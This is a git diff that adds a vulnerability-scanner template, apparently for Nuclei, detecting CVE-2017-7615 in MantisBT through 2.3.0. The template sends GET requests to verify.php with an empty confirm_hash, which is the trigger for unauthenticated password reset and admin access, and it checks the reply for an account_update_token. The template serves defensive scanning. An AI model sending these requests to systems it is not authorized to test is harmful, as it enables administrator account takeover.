diff --git a/cves/CVE-2017-7615.yaml b/cves/CVE-2017-7615.yaml new file mode 100644 index 0000000000..2d950214dd --- /dev/null +++ b/cves/CVE-2017-7615.yaml @@ -0,0 +1,27 @@ +id: cve-2017-7615 + +info: + name: CVE-2017-7615 + author: bp0lr + severity: high + description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. + # Reference to exploit + # https://www.exploit-db.com/exploits/41890 + +requests: + - method: GET + path: + - "{{BaseURL}}/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=" + - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=" + matchers-condition: and + matchers: + - type: word + words: + - "account_update_token" + part: body + + - type: status + status: + - 200